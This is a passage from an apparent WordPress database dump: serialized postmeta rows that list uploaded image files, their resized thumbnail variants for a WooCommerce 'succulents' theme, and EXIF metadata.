e-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:26:\"recipe-img-2-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:26:\"recipe-img-2-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:28:\"recipe-img-2-1-1028x1536.jpg\";s:5:\"width\";i:1028;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:26:\"recipe-img-2-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:27:\"recipe-img-2-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:27:\"recipe-img-2-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:28:\"recipe-img-2-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"recipe-img-2-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"recipe-img-2-1-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"recipe-img-2-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1521,1021,'_wp_attached_file','2018/01/Long-orange-banan2.jpg'),(1522,1021,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:653;s:4:\"file\";s:30:\"2018/01/Long-orange-banan2.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"Long-orange-banan2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"Long-orange-banan2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"Long-orange-banan2-600x204.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Long-orange-banan2-300x102.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:102;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"Long-orange-banan2-1024x348.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:348;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Long-orange-banan2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"Long-orange-banan2-768x261.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"Long-orange-banan2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"Long-orange-banan2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:31:\"Long-orange-banan2-1536x522.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:522;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"Long-orange-banan2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:31:\"Long-orange-banan2-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"Long-orange-banan2-550x653.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:653;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:31:\"Long-orange-banan2-1100x653.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:653;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"Long-orange-banan2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"Long-orange-banan2-600x204.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"Long-orange-banan2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552031192\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1523,2474,'_wp_attached_file','2018/01/product-10.jpg'),(1524,2474,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:22:\"2018/01/product-10.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-10-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"product-10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"product-10-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"product-10-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"product-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"product-10-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"product-10-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"product-10-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:22:\"product-10-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:22:\"product-10-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"product-10-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"product-10-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"product-10-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"product-10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1525,408,'_wp_attached_file','2018/01/h2-img-12.jpg'),(1526,408,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1100;s:4:\"file\";s:21:\"2018/01/h2-img-12.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h2-img-12-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h2-img-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"h2-img-12-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h2-img-12-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"h2-img-12-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h2-img-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"h2-img-12-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"h2-img-12-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"h2-img-12-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"h2-img-12-1536x880.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"h2-img-12-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:22:\"h2-img-12-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"h2-img-12-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:23:\"h2-img-12-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"h2-img-12-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"h2-img-12-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h2-img-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1527,1809,'_wp_attachment_image_alt','a'),(1528,1810,'_wp_attached_file','2018/02/portfolio-img-8.jpg'),(1529,1810,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:27:\"2018/02/portfolio-img-8.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"portfolio-img-8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"portfolio-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"portfolio-img-8-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"portfolio-img-8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"portfolio-img-8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"portfolio-img-8-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:27:\"portfolio-img-8-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:27:\"portfolio-img-8-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:27:\"portfolio-img-8-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:27:\"portfolio-img-8-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:27:\"portfolio-img-8-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"portfolio-img-8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"portfolio-img-8-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"portfolio-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1530,2474,'_wp_attachment_image_alt','a'),(1531,2475,'_wp_attached_file','2018/01/product-11.jpg'),(1532,2475,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:22:\"2018/01/product-11.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-11-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"product-11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"product-11-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"product-11-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"product-11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"product-11-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"product-11-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"product-11-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:22:\"product-11-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:22:\"product-11-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"product-11-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"product-11-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"product-11-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"product-11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1533,408,'_wp_attachment_image_alt','a'),(1534,409,'_wp_attached_file','2018/01/h2-img-13.png'),(1535,409,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:87;s:6:\"height\";i:83;s:4:\"file\";s:21:\"2018/01/h2-img-13.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1536,409,'_wp_attachment_image_alt','a'),(1537,429,'_wp_attached_file','2018/01/h2-img-14.png'),(1538,429,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:97;s:6:\"height\";i:83;s:4:\"file\";s:21:\"2018/01/h2-img-14.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1539,429,'_wp_attachment_image_alt','a'),(1540,431,'_wp_attached_file','2018/01/h2-img-15-1.png'),(1541,431,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:79;s:6:\"height\";i:83;s:4:\"file\";s:23:\"2018/01/h2-img-15-1.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1542,431,'_wp_attachment_image_alt','a'),(1543,432,'_wp_attached_file','2018/01/h2-img-16.png'),(1544,432,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:64;s:6:\"height\";i:83;s:4:\"file\";s:21:\"2018/01/h2-img-16.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1545,432,'_wp_attachment_image_alt','a'),(1546,453,'_wp_attached_file','2018/01/video-button.jpg'),(1547,453,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:473;s:6:\"height\";i:301;s:4:\"file\";s:24:\"2018/01/video-button.jpg\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"video-button-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"video-button-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"video-button-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"video-button-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:24:\"video-button-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:24:\"video-button-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"video-button-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1548,453,'_wp_attachment_image_alt','o'),(1549,470,'_wp_attached_file','2018/01/what-we-do-img-2.png'),(1550,470,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:243;s:6:\"height\";i:461;s:4:\"file\";s:28:\"2018/01/what-we-do-img-2.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"what-we-do-img-2-243x300.png\";s:5:\"width\";i:243;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"what-we-do-img-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"what-we-do-img-2-158x300.png\";s:5:\"width\";i:158;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"what-we-do-img-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"what-we-do-img-2-243x300.png\";s:5:\"width\";i:243;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"fil